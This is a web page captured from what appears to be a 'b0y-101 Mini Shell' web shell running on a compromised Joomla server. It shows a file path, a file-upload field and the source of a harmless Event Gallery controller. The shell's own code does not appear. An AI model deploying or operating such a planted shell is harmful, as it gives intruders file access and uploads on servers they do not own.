b0y-101 Mini Shell


Current Path : E:/www/instructor/teacher20/administrator/components/com_eventgallery/controllers/
File Upload :
Current File : E:/www/instructor/teacher20/administrator/components/com_eventgallery/controllers/documentation.php

<?php
/**
 * @package     Sven.Bluege
 * @subpackage  com_eventgallery
 *
 * @copyright   Copyright (C) 2005 - 2019 Sven Bluege All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

jimport( 'joomla.application.component.controllerform' );

require_once(__DIR__.'/../controller.php');

class EventgalleryControllerDocumentation extends JControllerForm
{

    protected $default_view = 'default';

	
	public function cancel($key = null) {
		$this->setRedirect( 'index.php?option=com_eventgallery');
	}
}

Copyright © 2019 by b0y-101